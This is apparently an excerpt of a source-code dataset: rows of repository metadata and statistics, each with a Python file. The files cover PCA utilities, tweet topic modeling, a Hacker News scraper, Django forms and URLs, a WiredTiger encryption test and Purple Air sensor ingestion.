| 0.009541
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06701
| false
| 0
| 0.082474
| 0
| 0.21134
| 0.005155
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32d410f0fad03a9c0fdccb975ef58812fe45a3f
| 4,576
|
py
|
Python
|
pca.py
|
vgp314/Udacity-Arvato-Identify-Customer-Segments
|
6be1d4f1eeac391c17c70fdf584bdc4813f80fd8
|
[
"ADSL"
] | 1
|
2020-05-21T23:56:57.000Z
|
2020-05-21T23:56:57.000Z
|
pca.py
|
vgp314/Udacity-Arvato-Identify-Customer-Segments
|
6be1d4f1eeac391c17c70fdf584bdc4813f80fd8
|
[
"ADSL"
] | null | null | null |
pca.py
|
vgp314/Udacity-Arvato-Identify-Customer-Segments
|
6be1d4f1eeac391c17c70fdf584bdc4813f80fd8
|
[
"ADSL"
] | null | null | null |
#pca model n componentes
from sklearn.decomposition import PCA
import numpy as np
from pylab import rcParams
import matplotlib.pyplot as plt
import pandas as pd
def pca_model_n_components(df,n_components):
'''
Definition:
Initialize pca with n_components
args:
dataframe and number of components
returns:
pca initialized and pca fitted and transformed
'''
pca = PCA(n_components)
return pca,pca.fit_transform(df)
def pca_model(df):
'''
Definition:
Initialize pca
args:
dataframe
returns:
pca initialized and pca fitted and transformed
'''
pca = PCA()
return pca,pca.fit_transform(df)
def get_min_components_variance(df,retain_variance):
'''
Definition:
get min components to retain variance
args:
dataframe and retained_variance ratio
returns:
number of min components to retain variance
'''
pca,pca_tranformed = pca_model(df)
cumulative_sum = np.cumsum(pca.explained_variance_ratio_)
return min(np.where(cumulative_sum>=retain_variance)[0]+1)
def plot_curve_min_components_variance(df,mode="cumulative_variance"):
'''
Definition:
plot curve of variance of pca
args:
dataframe and mode to be plotted (cumulative_variance or variance)
returns:
None, only plot the curve
'''
rcParams['figure.figsize'] = 12, 8
pca,pca_transformed = pca_model(df)
fig = plt.figure()
explained_variance = pca.explained_variance_ratio_
cumulative_sum = np.cumsum(explained_variance)
n_components = len(explained_variance)
ind = np.arange(n_components)
ax = plt.subplot(111)
if(mode=="cumulative_variance"):
title = "Explained Cumulative Variance per Principal Component"
ylabel = "Cumulative Variance (%)"
ax.plot(ind, cumulative_sum)
mark_1 = get_min_components_variance(df,0.2)
mark_2 = get_min_components_variance(df,0.4)
mark_3 = get_min_components_variance(df,0.6)
mark_4 = get_min_components_variance(df,0.8)
mark_5 = get_min_components_variance(df,0.9)
mark_6 = get_min_components_variance(df,0.95)
mark_7 = get_min_components_variance(df,0.99)
plt.hlines(y=0.2, xmin=0, xmax=mark_1, color='green', linestyles='dashed',zorder=1)
plt.hlines(y=0.4, xmin=0, xmax=mark_2, color='green', linestyles='dashed',zorder=2)
plt.hlines(y=0.6, xmin=0, xmax=mark_3, color='green', linestyles='dashed',zorder=3)
plt.hlines(y=0.8, xmin=0, xmax=mark_4, color='green', linestyles='dashed',zorder=4)
plt.hlines(y=0.9, xmin=0, xmax=mark_5, color='green', linestyles='dashed',zorder=5)
plt.hlines(y=0.95, xmin=0, xmax=mark_6, color='green', linestyles='dashed',zorder=6)
plt.hlines(y=0.99, xmin=0, xmax=mark_7, color='green', linestyles='dashed',zorder=6)
plt.vlines(x=mark_1, ymin=0, ymax=0.2, color='green', linestyles='dashed',zorder=7)
plt.vlines(x=mark_2, ymin=0, ymax=0.4, color='green', linestyles='dashed',zorder=8)
plt.vlines(x=mark_3, ymin=0, ymax=0.6, color='green', linestyles='dashed',zorder=9)
plt.vlines(x=mark_4, ymin=0, ymax=0.8, color='green', linestyles='dashed',zorder=10)
plt.vlines(x=mark_5, ymin=0, ymax=0.9, color='green', linestyles='dashed',zorder=11)
plt.vlines(x=mark_6, ymin=0, ymax=0.95, color='green', linestyles='dashed',zorder=12)
plt.vlines(x=mark_7, ymin=0, ymax=0.99, color='green', linestyles='dashed',zorder=12)
else:
title = "Variance per Principal Component"
ylabel = "Variance (%)"
ax.plot(ind, explained_variance)
ax.set_xlabel("Number of principal components")
ax.set_ylabel(ylabel)
plt.title(title)
def report_features(feature_names,pca,component_number):
'''
Definition:
This function returns the weights of the original features in relation to a component number of pca
args:
feature_names, pca model and the component_number
returns:
data frame with features names and the correspondent weights
'''
components = pca.components_
feature_weights = dict(zip(feature_names, components[component_number]))
sorted_weights = sorted(feature_weights.items(), key = lambda kv: kv[1])
data = []
for feature, weight, in sorted_weights:
data.append([feature,weight])
df = pd.DataFrame(data,columns=["feature","weight"])
df.set_index("feature",inplace=True)
return df
| 29.908497
| 101
| 0.671547
| 643
| 4,576
| 4.625194
| 0.206843
| 0.047075
| 0.094149
| 0.122394
| 0.327169
| 0.221587
| 0.079354
| 0.035642
| 0.035642
| 0.035642
| 0
| 0.030454
| 0.210664
| 4,576
| 152
| 102
| 30.105263
| 0.792913
| 0.210664
| 0
| 0.030303
| 0
| 0
| 0.102704
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075758
| false
| 0
| 0.075758
| 0
| 0.212121
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32ec2ac9f37deceb74746f32c5ce3fa89c08ee8
| 4,446
|
py
|
Python
|
media_analyzer/core/top_news.py
|
nyancol/MediaAnalyzer
|
fe504aa63646d27dfca6ca2c5435b0877d65ab2a
|
[
"MIT"
] | null | null | null |
media_analyzer/core/top_news.py
|
nyancol/MediaAnalyzer
|
fe504aa63646d27dfca6ca2c5435b0877d65ab2a
|
[
"MIT"
] | null | null | null |
media_analyzer/core/top_news.py
|
nyancol/MediaAnalyzer
|
fe504aa63646d27dfca6ca2c5435b0877d65ab2a
|
[
"MIT"
] | null | null | null |
import datetime
import numpy as np
import json
from sklearn.decomposition import NMF, LatentDirichletAllocation, TruncatedSVD
from sklearn.feature_extraction.text import CountVectorizer
from nltk.corpus import stopwords
import spacy
from media_analyzer import database
NUM_TOPICS = 20
def load_data(begin, end, language):
res = None
with database.connection() as conn:
cur = conn.cursor()
cur.execute(f"""SELECT text, tokens
FROM tweets
WHERE language = '{language}'
AND '{begin}'::date < created_at
AND created_at < '{end}'::date;""")
res = cur.fetchall()
return [{"text": text, "tokens": tokens} for text, tokens in res]
def create_model(language, data):
stop_words = stopwords.words(language)
vectorizer = CountVectorizer(min_df=5, max_df=0.9, lowercase=True,
stop_words=stop_words, token_pattern='[a-zA-Z\-][a-zA-Z\-]{2,}')
data_vectorized = vectorizer.fit_transform(data)
# Build a Non-Negative Matrix Factorization Model
nmf_model = NMF(n_components=NUM_TOPICS)
nmf_Z = nmf_model.fit_transform(data_vectorized)
return nmf_model, vectorizer.get_feature_names()
def get_top_topics(language, tweets):
model, vocabulary = create_model(language, [tweet["text"] for tweet in tweets])
components = []
special_words = {"nhttps"}
for topic in model.components_:
keywords = [vocabulary[i] for i in np.argwhere(topic >= 1).flatten()]
keywords = [key for key in keywords if key not in special_words]
if keywords:
components.append(keywords)
return components
def get_last_date(language):
res = None
with database.connection() as conn:
cur = conn.cursor()
cur.execute(f"""SELECT MAX(begin)
FROM thirty_days_topics
WHERE language = '{language}';""")
res = cur.fetchone()
return res[0] if res else None
def save_topics(begin, language, topics):
sql = """INSERT INTO thirty_days_topics (begin, language, topics)
VALUES (%(begin)s, %(language)s, %(topics)s);"""
entry = {"begin": begin, "language": language, "topics": json.dumps(topics)}
with database.connection() as conn:
cur = conn.cursor()
cur.execute(sql, entry)
conn.commit()
cur.close()
def get_date_fist_tweets():
res = None
with database.connection() as conn:
cur = conn.cursor()
cur.execute("SELECT MIN(created_at) FROM tweets;")
res = cur.fetchone()
return res[0]
def count_matches(tweets, topics, language):
def count_matches_tweet(tokens, topics):
topics = [set(keywords) for keywords in topics]
topics_matched = np.zeros(len(topics), dtype=int)
for i, keywords in enumerate(topics):
if any([token in keywords for token in tokens]):
topics_matched[i] = 1
return topics_matched
def get_tokens(language, topics):
parsers = {"english": "en", "french": "fr",
"spanish": "es", "italian": "it"}
parser = spacy.load(parsers[language])
return [[parser(key)[0].lemma_ for key in keywords] for keywords in topics]
tokenized_topics = get_tokens(language, topics)
matches = np.zeros(len(topics), dtype=int)
for tweet in tweets:
matches += count_matches_tweet(tweet["tokens"], tokenized_topics)
return [{"keywords": topic, "matches": match}
for topic, match in zip(topics, matches.tolist())]
def compute_language(language):
begin = get_last_date(language)
if begin is None:
begin = datetime.datetime(2018, 12, 1).date()
else:
begin += datetime.timedelta(days=1)
while begin < datetime.datetime.now().date() - datetime.timedelta(days=30):
end = begin + datetime.timedelta(days=30)
print(f"Computing interval: {begin} -> {end} for {language}")
tweets = load_data(begin, end, language)
topics = get_top_topics(language, tweets)
topics = count_matches(tweets, topics, language)
save_topics(begin, language, topics)
begin += datetime.timedelta(days=1)
def compute():
languages = database.get_languages()
for language in languages:
compute_language(language)
if __name__ == "__main__":
compute()
| 33.938931
| 97
| 0.634278
| 540
| 4,446
| 5.087037
| 0.285185
| 0.035675
| 0.032035
| 0.034947
| 0.247179
| 0.12996
| 0.112486
| 0.092829
| 0.092829
| 0.092829
| 0
| 0.007207
| 0.251012
| 4,446
| 130
| 98
| 34.2
| 0.817718
| 0.010571
| 0
| 0.147059
| 0
| 0
| 0.154196
| 0.005458
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107843
| false
| 0
| 0.078431
| 0
| 0.264706
| 0.009804
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3325c6fb73e3191f10fa77771bfdc292d1ff768
| 2,586
|
py
|
Python
|
scraper.py
|
squash-bit/Automate-Whatsapp-News
|
9bdbbbb397dc680825b19adcda4da81d1f66270c
|
[
"MIT"
] | 4
|
2020-11-21T19:08:56.000Z
|
2021-05-06T13:09:45.000Z
|
scraper.py
|
squash-bit/Agent-Wallie
|
9bdbbbb397dc680825b19adcda4da81d1f66270c
|
[
"MIT"
] | 1
|
2021-05-06T19:26:06.000Z
|
2021-05-06T19:26:06.000Z
|
scraper.py
|
squash-bit/Agent-Wallie
|
9bdbbbb397dc680825b19adcda4da81d1f66270c
|
[
"MIT"
] | 1
|
2021-05-06T13:25:08.000Z
|
2021-05-06T13:25:08.000Z
|
# import necessary modules
import os
import re
import requests
import newspaper
from bs4 import BeautifulSoup
from newspaper import Article
from newspaper import Config
from article_summarizer import summarizer
from time import sleep
# clean data
class Cleanser:
"""Scrape the news site and get the relevant updates.."""
def __init__(self, buzz_words):
# get the markup from ['https://yourwebpage.com/']
self.url = 'https://news.ycombinator.com/news'
self.buzz_words = buzz_words
self.articles_final = []
def gather_info(self):
# get recommended articles[title, link, summary] only for user
try:
# scrape only links and titles of articles present in the url:https://news.ycombinator.com/news
# then summarize each article using it's link...
r = requests.get(self.url)
html_soup = BeautifulSoup(r.text, 'html.parser')
for item in html_soup.find_all('tr', class_='athing'):
item_a = item.find('a', class_='storylink')
item_link = item_a.get('href') if item_a else None
item_text = item_a.get_text(strip=True) if item_a else None
# list of words that occur most frequent in article
keywords = self.get_keywords(item_link)
for buzz_word in self.buzz_words:
# find articles that contains any of buzz_words by iterating through the keywords
if buzz_word.lower() in keywords:
print(keywords)
# summarize contents using article_summarizer
summary = summarizer(item_link)
self.articles_final.append(
{'link' : item_link,
'title' : item_text,
'summary': summary})
except requests.exceptions.SSLError:
print("Max retries exceeded, Try again later...")
return self.articles_final
# get a list of words that occur most frequent in an article
def get_keywords(self, url):
user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
config = Config()
config.browser_user_agent = user_agent
paper = Article(url, config=config)
try:
paper.download()
paper.parse()
paper.nlp()
except:
return []
return paper.keywords
| 39.181818
| 144
| 0.593968
| 311
| 2,586
| 4.803859
| 0.421222
| 0.03012
| 0.026104
| 0.03079
| 0.105756
| 0.085676
| 0.045515
| 0.045515
| 0
| 0
| 0
| 0.01611
| 0.32792
| 2,586
| 65
| 145
| 39.784615
| 0.843498
| 0.221191
| 0
| 0.043478
| 0
| 0.021739
| 0.121561
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0.195652
| 0
| 0.347826
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3340d73b31131cbb0f369140b3afe55408788f6
| 1,351
|
py
|
Python
|
soli/aria/forms/species.py
|
rcdixon/soli
|
d29c77c1d391dfcc3c0dd0297ecf93fa9aa046ab
|
[
"MIT"
] | null | null | null |
soli/aria/forms/species.py
|
rcdixon/soli
|
d29c77c1d391dfcc3c0dd0297ecf93fa9aa046ab
|
[
"MIT"
] | null | null | null |
soli/aria/forms/species.py
|
rcdixon/soli
|
d29c77c1d391dfcc3c0dd0297ecf93fa9aa046ab
|
[
"MIT"
] | null | null | null |
from aria.models import Genus, Species, Subspecies
from django import forms
from django.forms import inlineformset_factory
from .templates.templates import createTextInput, createSelectInput
class CreateSpeciesForm(forms.ModelForm):
class Meta:
model = Species
fields = ["name", "common_name"]
widgets = {
"name": createTextInput("Species"),
"common_name": createTextInput("Common Name")
}
def __init__(self, *args, **kwargs):
super(CreateSpeciesForm, self).__init__(*args, **kwargs)
self.fields["genus"] = forms.ModelChoiceField(
queryset=Genus.objects.all().order_by("name"),
widget=createSelectInput("Genus", ["font-italic"]))
self.fields["genus"].empty_label = "Genus"
def saveSpecies(self, request):
species = self.save(commit=False)
species.sp_ge_num = Genus(ge_num=request.POST["genus"])
species.save()
def subspeciesFormSet(species=Species()):
formset = inlineformset_factory(
Species,
Subspecies,
fields=["name"],
extra=1,
can_delete=False,
widgets={
"name": createTextInput("Subspecies")
})
subspecies = formset(instance=species)
if len(subspecies) == 1:
subspecies = subspecies[0]
return subspecies
| 29.369565
| 67
| 0.634345
| 132
| 1,351
| 6.356061
| 0.454545
| 0.035757
| 0.061979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002944
| 0.245744
| 1,351
| 45
| 68
| 30.022222
| 0.820412
| 0
| 0
| 0.055556
| 0
| 0
| 0.07846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.111111
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3349b6abd791f21baf0e781406ef6802460401f
| 285
|
py
|
Python
|
hour.py
|
anokata/pythonPetProjects
|
245c3ff11ae560b17830970061d8d60013948fd7
|
[
"MIT"
] | 3
|
2017-04-30T17:44:53.000Z
|
2018-02-03T06:02:11.000Z
|
hour.py
|
anokata/pythonPetProjects
|
245c3ff11ae560b17830970061d8d60013948fd7
|
[
"MIT"
] | 10
|
2021-03-18T20:17:19.000Z
|
2022-03-11T23:14:19.000Z
|
hour.py
|
anokata/pythonPetProjects
|
245c3ff11ae560b17830970061d8d60013948fd7
|
[
"MIT"
] | null | null | null |
import math
def angle(m):
return 5.5 * m/60;
print(angle(20))
i = 0
for m in range(0,1440*60):
a = angle(m) / 360
d = a - math.floor(a)
if (d < 0.00001):
print(a, math.floor(a), d, d == 0.0)
i += 1
print(i)
for m in range(25):
print(360*m/5.5)
| 14.25
| 44
| 0.508772
| 58
| 285
| 2.5
| 0.413793
| 0.082759
| 0.082759
| 0.151724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.165829
| 0.301754
| 285
| 19
| 45
| 15
| 0.562814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.071429
| 0.071429
| 0.214286
| 0.285714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33556dfd1ea6c5a377213bf148dae18a67adec5
| 4,038
|
py
|
Python
|
src/third_party/wiredtiger/test/suite/test_encrypt08.py
|
benety/mongo
|
203430ac9559f82ca01e3cbb3b0e09149fec0835
|
[
"Apache-2.0"
] | null | null | null |
src/third_party/wiredtiger/test/suite/test_encrypt08.py
|
benety/mongo
|
203430ac9559f82ca01e3cbb3b0e09149fec0835
|
[
"Apache-2.0"
] | null | null | null |
src/third_party/wiredtiger/test/suite/test_encrypt08.py
|
benety/mongo
|
203430ac9559f82ca01e3cbb3b0e09149fec0835
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Public Domain 2014-present MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# test_encrypt08.py
# Test some error conditions with the libsodium encryption extension.
#
import wiredtiger, wttest
from wtscenario import make_scenarios
#
# Test sodium encryption configuration.
# This exercises the error paths in the encryptor's customize method when
# used for system (not per-table) encryption.
#
class test_encrypt08(wttest.WiredTigerTestCase):
uri = 'file:test_encrypt08'
# To test the sodium encryptor, we use secretkey= rather than
# setting a keyid, because for a "real" (vs. test-only) encryptor,
# keyids require some kind of key server, and (a) setting one up
# for testing would be a nuisance and (b) currently the sodium
# encryptor doesn't support any anyway.
#
# It expects secretkey= to provide a hex-encoded 256-bit chacha20 key.
# This key will serve for testing purposes.
sodium_testkey = '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
encrypt_type = [
('nokey', dict( sys_encrypt='',
msg='/no key given/')),
('keyid', dict( sys_encrypt='keyid=123',
msg='/keyids not supported/')),
('twokeys', dict( sys_encrypt='keyid=123,secretkey=' + sodium_testkey,
msg='/keys specified with both/')),
('nothex', dict( sys_encrypt='secretkey=plop',
msg='/secret key not hex/')),
('badsize', dict( sys_encrypt='secretkey=0123456789abcdef',
msg='/wrong secret key length/')),
]
scenarios = make_scenarios(encrypt_type)
def conn_extensions(self, extlist):
extlist.skip_if_missing = True
extlist.extension('encryptors', 'sodium')
# Do not use conn_config to set the encryption, because that sets
# the encryption during open when we don't have control and can't
# catch exceptions. Instead we'll let the frameork open without
# encryption and then reopen ourselves. This seems to behave as
# desired (we get the intended errors from inside the encryptor)
# even though one might expect it to fail because it's reopening
# the database with different encryption. (If in the future it starts
# doing that, the workaround is to override setUpConnectionOpen.
# I'm not doing that now because it's quite a bit messier.)
# (Re)open the database with bad encryption config.
def test_encrypt(self):
sysconfig = 'encryption=(name=sodium,{0}),'.format(self.sys_encrypt)
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:
self.reopen_conn(config = sysconfig),
self.msg)
if __name__ == '__main__':
wttest.run()
| 43.419355
| 87
| 0.698613
| 543
| 4,038
| 5.141805
| 0.488029
| 0.02149
| 0.025072
| 0.01361
| 0.015759
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025584
| 0.225607
| 4,038
| 92
| 88
| 43.891304
| 0.867285
| 0.620109
| 0
| 0
| 0
| 0
| 0.231081
| 0.080405
| 0
| 0
| 0
| 0
| 0.034483
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.310345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a336bdbfb6767de53ac20167cacab792872e5ecf
| 1,779
|
py
|
Python
|
{{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/urls.py
|
mabdullahabid/cookiecutter-django-rest
|
8cab90f115b99f7b700ec38a08cb3647eb0a847b
|
[
"MIT"
] | null | null | null |
{{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/urls.py
|
mabdullahabid/cookiecutter-django-rest
|
8cab90f115b99f7b700ec38a08cb3647eb0a847b
|
[
"MIT"
] | null | null | null |
{{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/urls.py
|
mabdullahabid/cookiecutter-django-rest
|
8cab90f115b99f7b700ec38a08cb3647eb0a847b
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, re_path, include, reverse_lazy
from django.views.generic.base import RedirectView
from rest_framework import permissions
from rest_framework.authtoken import views
from rest_framework.routers import DefaultRouter
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from .users.views import UserViewSet, UserCreateViewSet
router = DefaultRouter()
router.register(r"users", UserViewSet)
router.register(r"users", UserCreateViewSet)
urlpatterns = [
path("admin/", admin.site.urls),
path("api/v1/", include(router.urls)),
path("api-token-auth/", views.obtain_auth_token),
path("api-auth/", include("rest_framework.urls", namespace="rest_framework")),
# the 'api-root' from django rest-frameworks default router
# http://www.django-rest-framework.org/api-guide/routers/#defaultrouter
re_path(r"^$", RedirectView.as_view(url=reverse_lazy("api-root"), permanent=False)),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
admin.site.site_header = "{{ cookiecutter.app_title }}"
admin.site.site_title = "{{ cookiecutter.app_title }} Admin Portal"
admin.site.index_title = "{{ cookiecutter.app_title }} Admin"
# Swagger
api_info = openapi.Info(
title="{{ cookiecutter.app_title }} API",
default_version="v1",
description="API Documentation for {{ cookiecutter.app_title }}",
contact=openapi.Contact(email="{{ cookiecutter.email }}"),
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| 35.58
| 88
| 0.754918
| 231
| 1,779
| 5.649351
| 0.363636
| 0.045977
| 0.076628
| 0.057471
| 0.045977
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001906
| 0.115233
| 1,779
| 50
| 89
| 35.58
| 0.827192
| 0.075323
| 0
| 0
| 0
| 0
| 0.19805
| 0.067032
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.289474
| 0
| 0.289474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33868010eb5e7ae344ef9b1e3fe0336947b0c2f
| 4,260
|
py
|
Python
|
pdk_api.py
|
audacious-software/Passive-Data-Kit-External-Sensors
|
c4781c04ce3cb485b0c1e50a9e7c6db0c92a9959
|
[
"Apache-2.0"
] | null | null | null |
pdk_api.py
|
audacious-software/Passive-Data-Kit-External-Sensors
|
c4781c04ce3cb485b0c1e50a9e7c6db0c92a9959
|
[
"Apache-2.0"
] | null | null | null |
pdk_api.py
|
audacious-software/Passive-Data-Kit-External-Sensors
|
c4781c04ce3cb485b0c1e50a9e7c6db0c92a9959
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=line-too-long, no-member
from __future__ import print_function
import arrow
import requests
from django.conf import settings
from django.contrib.gis.geos import GEOSGeometry
from django.utils import timezone
from django.utils.text import slugify
from passive_data_kit_external_sensors.models import SensorRegion, Sensor, SensorLocation, SensorDataPayload, SensorModel
def fetch_sensors():
sensors = []
if hasattr(settings, 'PDK_EXTERNAL_SENSORS_PURPLE_AIR_URL'): # pylint: disable=too-many-nested-blocks
valid_region = None
for region in SensorRegion.objects.filter(include_sensors=True):
if valid_region is None:
valid_region = region.bounds
else:
valid_region = valid_region.union(region.bounds)
response = requests.get(settings.PDK_EXTERNAL_SENSORS_PURPLE_AIR_URL)
if response.status_code == 200:
sensors = response.json()['results']
region_matches = []
for sensor in sensors:
if 'Lat' in sensor and 'Lon' in sensor:
sensor_location = GEOSGeometry('POINT(%f %f)' % (sensor['Lon'], sensor['Lat'],))
if valid_region.contains(sensor_location):
if 'ID' in sensor:
sensor['pdk_identifier'] = 'purpleair-' + str(sensor['ID'])
if 'LastSeen' in sensor:
sensor['pdk_observed'] = arrow.get(sensor['LastSeen']).datetime
region_matches.append(sensor)
# else:
# print('INCOMPLETE? ' + json.dumps(sensor, indent=2))
print('START: ' + str(len(sensors)) + ' - IMPORT: ' + str(len(region_matches)))
else:
print('Unexpected HTTP status code for ' + settings.PDK_EXTERNAL_SENSORS_PURPLE_AIR_URL+ ' - ' + str(response.status_code))
return sensors
def ingest_sensor_data(sensor_data):
if 'pdk_identifier' in sensor_data:
identifier = sensor_data['pdk_identifier']
if identifier.startswith('purpleair-') and ('pdk_observed' in sensor_data) and ('Lat' in sensor_data) and ('Lon' in sensor_data):
model = None
if 'Type' in sensor_data:
model = SensorModel.objects.filter(identifier=slugify(sensor_data['Type'])).first()
if model is None:
model = SensorModel(identifier=slugify(sensor_data['Type']), name=sensor_data['Type'])
model.manufacturer = 'Unknown (via Purple Air)'
model.save()
sensor = Sensor.objects.filter(identifier=identifier).first()
now = timezone.now()
if sensor is None:
sensor = Sensor(identifier=identifier)
if 'Label' in sensor_data:
sensor.name = sensor_data['Label'].strip()
else:
sensor.name = identifier
sensor.added = now
sensor.model = model
sensor.save()
sensor.last_checked = now
sensor.save()
payload_when = sensor_data['pdk_observed']
del sensor_data['pdk_observed']
sensor_location = GEOSGeometry('POINT(%f %f)' % (sensor_data['Lon'], sensor_data['Lat'],))
last_location = sensor.locations.all().order_by('-last_observed').first()
if last_location is None or last_location.location.distance(sensor_location) > 0.00001:
last_location = SensorLocation.objects.create(sensor=sensor, first_observed=now, last_observed=now, location=sensor_location)
else:
if last_location.last_observed != payload_when:
last_location.last_observed = payload_when
last_location.save()
last_payload = sensor.data_payloads.filter(observed__gte=payload_when).first()
if last_payload is None:
print('ADDING PAYLOAD...')
data_payload = SensorDataPayload(sensor=sensor, observed=payload_when, location=last_location)
data_payload.definition = sensor_data
data_payload.save()
| 38.035714
| 141
| 0.603286
| 456
| 4,260
| 5.425439
| 0.27193
| 0.076799
| 0.029103
| 0.031528
| 0.135812
| 0.110752
| 0.110752
| 0.033145
| 0
| 0
| 0
| 0.00335
| 0.299296
| 4,260
| 111
| 142
| 38.378378
| 0.825461
| 0.033099
| 0
| 0.081081
| 0
| 0
| 0.086048
| 0.008508
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0.013514
| 0.121622
| 0
| 0.162162
| 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a339496b618754603c49253c77c1461b236400c0
| 37,496
|
py
|
Python
|
fgcm/fgcmConfig.py
|
erykoff/fgcm
|
51c39c5c7f904fbac755e775038730b4e6ba11bd
|
[
"Apache-2.0"
] | 5
|
2018-02-02T15:36:46.000Z
|
2021-05-11T21:54:49.000Z
|
fgcm/fgcmConfig.py
|
erykoff/fgcm
|
51c39c5c7f904fbac755e775038730b4e6ba11bd
|
[
"Apache-2.0"
] | 1
|
2021-08-19T19:56:33.000Z
|
2021-08-19T19:56:33.000Z
|
fgcm/fgcmConfig.py
|
lsst/fgcm
|
51c39c5c7f904fbac755e775038730b4e6ba11bd
|
[
"Apache-2.0"
] | 10
|
2019-01-09T22:50:04.000Z
